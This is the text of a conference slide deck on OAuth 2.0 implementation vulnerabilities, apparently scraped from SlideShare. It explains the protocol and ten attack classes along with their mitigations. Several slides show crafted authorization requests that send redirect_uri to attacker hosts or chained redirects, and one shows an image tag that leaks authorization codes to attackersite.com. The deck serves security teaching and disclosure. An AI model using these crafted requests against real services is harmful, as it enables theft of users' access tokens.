SlideShare uma empresa Scribd logo

Top X OAuth 2 Hacks

Antonio Sanso
Antonio Sanso

Top 10 OAuth 2 Implementation Vulnerabilities

Software
1 de 71
Baixar para ler offline
Top X OAuth 2 Hacks
 (OAuth Implementation vulnerabilities) Antonio Sanso (@asanso) Senior Software Engineer Adobe Research Switzerland
Who is this guy, BTW? {  Senior Software Engineer Adobe Research Switzerland {  Internet Bug Bounty, Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty, Microsoft Honor Roll {  Found vulnerabilities in OpenSSL , Google Chrome, Apple Safari {  Co-Author of “OAuth 2 in Action”
Co-author of “OAuth 2 in Action”
 https://www.manning.com/books/oauth-2-in-action ctwvdt17
Agenda { Introducing OAuth 2.0 { The “OAuth dance” { OAuth 2.0 Implementation Vulnerabilities ★
Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
A bit of history – OAuth 1.0a
A bit of history – OAuth 2.0 2 years X
The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
{ Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) { Attacker (Antonio) OAuth Actors www.printondemand.biz
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go 8. Give me the profile pictures, here is the Access Token Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=photo&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /photo HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
Traditional OAuth “dance” - Authorization Code Grant aka server side flow From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 Resource Owner Authorization Server Protected Resource Client Resource owner’s credentials Client’s credentials Authorization code Access token
Traditional OAuth “dance” #2- client side flow Client inside the browser 1. Printondemand wants an Access Token 2. Login and authorize 3. Here the Access Token 4. Give me the profile pictures, here is the Access Token ★
Traditional OAuth “dance” – Implicit Grant aka client side flow From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 Resource Owner Authorization Server Protected Resource Client Inside the Browser Implicit grant type uses only the front channel since the client is inside the browser
OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
#10 The Postman Always Rings Twice From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 *Image taken from the movie The Postman Always Rings Twice""
From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #10 The Postman Always Rings Twice *Image taken from the movie The Postman Always Rings Twice""
#10 The Postman Always Rings Twice Mitigation RFC 6749 - Section-4.1.3 The client MUST NOT use the authorization code more than once. If an authorization code is used more than once, the authorization server MUST deny the request and SHOULD revoke (when possible) all tokens previously issued based on that authorization code. Attack http://intothesymmetry.blogspot.ch/2014/02/oauth-2-attacks-and-bug-bounties.html *Image taken from the movie The Postman Always Rings Twice""
*Image taken from the movie Match Point"" RFC 6749 - Section-4.1.3 ...if the "redirect_uri" parameter was included in the initial authorization request as described in Section 4.1.1, and if included ensure that their values are identical. Attack http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html #9 Match Point
Resource Owner Authorization Server Protected Resource Client Resource owner’s credentials Client’s credentials Authorization code Access token #9 Match Point From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www- form-urlencoded! ! grant_type=authorization_code&code =SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97e d46d29bc9b0251&! redirect_uri=https%3A%2F %2Fwww.printondemand.biz %2Fcallback ! ! ! GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! *Image taken from the movie Match Point""
#8 Open redirect in rfc6749
 http://intothesymmetry.blogspot.ie/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html
 • Owasp Top10 #10 • Controversial web vulnerability • Often they are relatively benign • …but an open redirect is handy sometime (right? ) RFC 6749 - Section-4.1.2.1 ... If the resource owner denies the access request or if the request fails for reasons other than a missing or invalid redirection URI, the authorization server informs the client by adding the following parameters to the query component of the redirection URI using the "application/x-www-form- urlencoded" format, per Appendix B:.
From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #8 Open redirect in rfc6749
 http://intothesymmetry.blogspot.ie/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html

From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #8 Open redirect in rfc6749
 http://intothesymmetry.blogspot.ie/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html

• Facebook: https://graph.facebook.com/oauth/authorize? response_type=code&client_id=1621835668046481&redirect_uri=http:/ /www.attacker.com/&scope=WRONG_SCOPE • Github: https://github.com/login/oauth/authorize? response_type=code&redirect_uri=http:// attacker.com2&client_id=e2ddb90328315c367b11 • Microsoft: https://login.live.com/oauth20_authorize.srf? response_type=code&redirect_uri=http:// attacker.com&client_id=000000004C12822C #8 Open redirect in rfc6749
 http://intothesymmetry.blogspot.ie/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html

Remember TOFU ? https://login.live.com/oauth20_authorize.srf? client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&re direct_uri=https%3A%2F%2Fwww.facebook.com%2F #8 Open redirect in rfc6749
 http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html

#8 Open redirect in rfc6749
 http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html
 https://login.live.com/oauth20_authorize.srf? client_id=0000000044002503&response_type=token&scope=wli.contacts_emails& redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh%5B%5D%26u %3Dgraph.facebook.com%252Foauth%252Fauthorize%253Ftype %253Dweb_server%2526scope%253De%2526client_id %253D260755904036570%2526redirect_uri%253Dhttp%253A%252F %252Fsimcracy.com http://simcracy.com#access_token=ACCESS_TOKEN
#8 Open redirect in rfc6749 – 
 Bonus Safari URI Spoofing (CVE-2015-5764) Moves: https://api.moves-app.com/oauth/v1/authorize? response_type=code&client_id=bc88FitX1298KPj2WS259BBMa9_KCfL3& redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert()</ script> CVE-2015-5764 http://intothesymmetry.blogspot.it/2015/09/apple-safari-uri-spoofing-cve-2015-5764.html
#8 Open redirect in rfc6749 – Mitigations https://tools.ietf.org/html/draft-ietf-oauth-closing-redirectors-00 • Respond with an HTTP 400 (Bad Request) status code. • Perform a redirect to an intermediate URI under the control of the AS to clear referrer information in the browser that may contain security token information • Fragment "#" MUST be appended to the error redirect URI. This prevents the browser from reattaching the fragment from a previous URI to the new location URI.
#7 Native apps – Which OAuth flow ? • It is NOT recommended that native applications use the implicit flow. • Native clients CAN NOT protect a client_secret unless it is configured at runtime as in the dynamic registration case (RFC 7591). Attack http://stephensclafani.com/2014/07/29/hacking-facebooks-legacy-api- part-2-stealing-user-sessions/
#6 Bearer Tokens The OAuth 2.0 Authorization Framework: Bearer Token Usage” [RFC 6750] GET /resource HTTP/1.1 Host: server.example.com Authorization: Bearer mF_9.B5f-4.1JqM POST /resource HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded access_token=mF_9.B5f-4.1JqM GET /resource?access_token=mF_9.B5f-4.1JqM HTTP/1.1 Host: server.example.com
#6 Bearer Tokens { The access token ends up being logged in access.log files (being the access token part of the URI) - http://thehackernews.com/2013/10/vulnerability-in-facebook-app- allows.html { People tend to be indiscriminate on what copy and past in public forum when searching for answer (e.g. Stackoverflow). { There is a risk of access token leakage through the referrer - http://intothesymmetry.blogspot.it/2015/10/on-oauth-token-hijacks- for-fun-and.html
#6 Bearer Tokens http://intothesymmetry.blogspot.it/2015/10/on-oauth-token-hijacks-for-fun-and.htmltml
 GET /! Host: sanso.github.io! Referer: https://word.office.live.com/……/#access_token=3AAQ…!
#5 Cross-site request forgery {  CSRF = Cross-site request forgery {  OWASP Top 10 - A8 Cross-Site Request Forgery (CSRF) {  Browsers make requests (with cookies) to any other origin From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017
#5 Cross-site request forgery Authorization Server
#5 Cross-site request forgery Authorization Server https://www.synack.com/2015/10/08/how-i-hacked-hotmail/
#5 Cross-site request forgery Authorization Server
#5 Cross-site request forgery Authorization Server Other Attacks {  http://homakov.blogspot.ch/2014/12/blatant-csrf-in-doorkeeper-most- popular.html {  http://intothesymmetry.blogspot.ch/2014/12/cross-site-request-forgery-in- github.html
#4 Cross-site request forgery OAuth Client From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017
#4 Cross-site request forgery OAuth Client http://blog.intothesymmetry.com/2017/04/csrf-in-facebookdropbox-mallory-added.html
Mitigation RFC 6749 An opaque value used by the client to maintain state between the request and callback. The authorization server includes this value when redirecting the user-agent back to the client. The parameter SHOULD be used for preventing cross-site request forgery (CSRF). #4 Cross-site request forgery OAuth Client Attacks {  http://homakov.blogspot.ch/2012/07/saferweb-most-common-oauth2.html {  https://blog.srcclr.com/spring-social-core-vulnerability-disclosure/ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback&state=dvlhl25gsfkk! ! !
#3 “Confused Deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada" ★
1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED www.printondemand.biz #3 “Confused Deputy” aka “The Devil Wears Prada” ★ * Image taken from the movie "The Devil Wears Prada"
www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED ★ #3 “Confused Deputy” aka “The Devil Wears Prada” * Image taken from the movie "The Devil Wears Prada"
From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home"
From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017 * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home”
* Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017
* Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html
From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2015 * Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html
* Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html https://plus.google.com/app/basic/stream/z12wz30w5xekhjow504ch3vq4wi1gjzrd3w
* Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” 
 http://intothesymmetry.blogspot.ie/2015/06/on-oauth-token-hijacks-for-fun-and.html GET /! Host: sanso.github.io! Referer: https://plus.google.com/app/basic/stream/ z12wz30w5xekhjow504ch3vq4wi1gjzrd3w /……/#access_token=3AAQ…!
* Image taken from the movie “Lassie Come Home" #2 – Exploit the redirect URI aka “Lassie Come Home” The registered redirect_uri must be as specific as it can be.
* Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token #1 – Exploit the redirect URI aka “Lassie Come Home” GET /signin/authorize? response_type=code&client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHo o1Ap9ChOV0XqPdZXQt&scope=openid %20profile&state=cbdfgjd&redirect_uri=https%3A%2F%clientapp/callback/ paypal! Host: www.paypal.com!
* Image taken from the movie “Lassie Come Home" #1 – Exploit the redirect URI aka “Lassie Come Home”
* Image taken from the movie “Lassie Come Home" And then there is the Paypal way: if (redirect_uri.startsWith(“localhost”)) {! GO FOR IT ! ! !}! #1 – Exploit the redirect URI aka “Lassie Come Home”
* Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token #1 – Exploit the redirect URI aka “Lassie Come Home” GET /signin/authorize? response_type=code&client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHo o1Ap9ChOV0XqPdZXQt&scope=openid %20profile&state=cbdfgjd&redirect_uri=http:// localhost.intothesymmetry.com/! Host: www.paypal.com!
* Image taken from the movie “Lassie Come Home" #1 – Exploit the redirect URI aka “Lassie Come Home” http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
* Image taken from the movie “Lassie Come Home" The ONLY safe validation method for redirect_uri the authorization server should adopt is exact matching #1 – Exploit the redirect URI aka “Lassie Come Home”
References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { http://oauth.net/articles/authentication/ { http://intothesymmetry.blogspot.ch/ { https://www.manning.com/books/oauth-2-in-action { @asanso
Questions?
✔ ✔ ✗ ✗ ✗ ✗ ✗ * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔ #1 – Exploit the redirect URI aka “Lassie Come Home”
1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔ #1 – Exploit the redirect URI aka “Lassie Come Home”
1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! ! #1 – Exploit the redirect URI aka “Lassie Come Home”
#1 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !

Recomendados

Cqcon
CqconCqcon
CqconAntonio Sanso
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015Antonio Sanso
 
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2016
 
Real-time Web Application with Socket.IO, Node.js, and Redis
Real-time Web Application with Socket.IO, Node.js, and RedisReal-time Web Application with Socket.IO, Node.js, and Redis
Real-time Web Application with Socket.IO, Node.js, and RedisYork Tsai
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsSecuRing
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
 

Recomendados

Cqcon
CqconCqcon
CqconAntonio Sanso
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015Antonio Sanso
 
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2016
 
Real-time Web Application with Socket.IO, Node.js, and Redis
Real-time Web Application with Socket.IO, Node.js, and RedisReal-time Web Application with Socket.IO, Node.js, and Redis
Real-time Web Application with Socket.IO, Node.js, and RedisYork Tsai
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsSecuRing
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
 
Real time web: is there a life without socket.io and node.js?
Real time web: is there a life without socket.io and node.js?Real time web: is there a life without socket.io and node.js?
Real time web: is there a life without socket.io and node.js?Eduard Trayan
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
URL to HTML
URL to HTMLURL to HTML
URL to HTMLFrancois Marier
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Bigger Stronger Faster
Bigger Stronger FasterBigger Stronger Faster
Bigger Stronger FasterChris Love
 
URL to HTML
URL to HTMLURL to HTML
URL to HTMLFrancois Marier
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Weird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingWeird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingRoel Palmaers
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Detecting headless browsers
Detecting headless browsersDetecting headless browsers
Detecting headless browsersSergey Shekyan
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON
 
Offensive MitM
Offensive MitMOffensive MitM
Offensive MitMnavajanegra
 
Zombiejs
ZombiejsZombiejs
ZombiejsВиктор Ткаченко
 
An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.BugRaptors
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNinad Sarang
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuAntonio Sanso
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuththariyarox
 

Mais conteúdo relacionado

Mais procurados

Real time web: is there a life without socket.io and node.js?
Real time web: is there a life without socket.io and node.js?Real time web: is there a life without socket.io and node.js?
Real time web: is there a life without socket.io and node.js?Eduard Trayan
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Bigger Stronger Faster
Bigger Stronger FasterBigger Stronger Faster
Bigger Stronger FasterChris Love
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Weird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingWeird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingRoel Palmaers
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Detecting headless browsers
Detecting headless browsersDetecting headless browsers
Detecting headless browsersSergey Shekyan
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON
 
An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.An introduction to PhantomJS: A headless browser for automation test.
An introduction to PhantomJS: A headless browser for automation test.BugRaptors
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNinad Sarang
 

Mais procurados (20)

Real time web: is there a life without socket.io and node.js?
Real time web: is there a life without socket.io and node.js?Real time web: is there a life without socket.io and node.js?
Real time web: is there a life without socket.io and node.js?
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Security
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
URL to HTML
URL to HTMLURL to HTML
URL to HTML
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
Bigger Stronger Faster
Bigger Stronger FasterBigger Stronger Faster
Bigger Stronger Faster
 
URL to HTML
URL to HTMLURL to HTML
URL to HTML
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Weird new tricks for browser fingerprinting
Weird new tricks for browser fingerprintingWeird new tricks for browser fingerprinting
Weird new tricks for browser fingerprinting
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
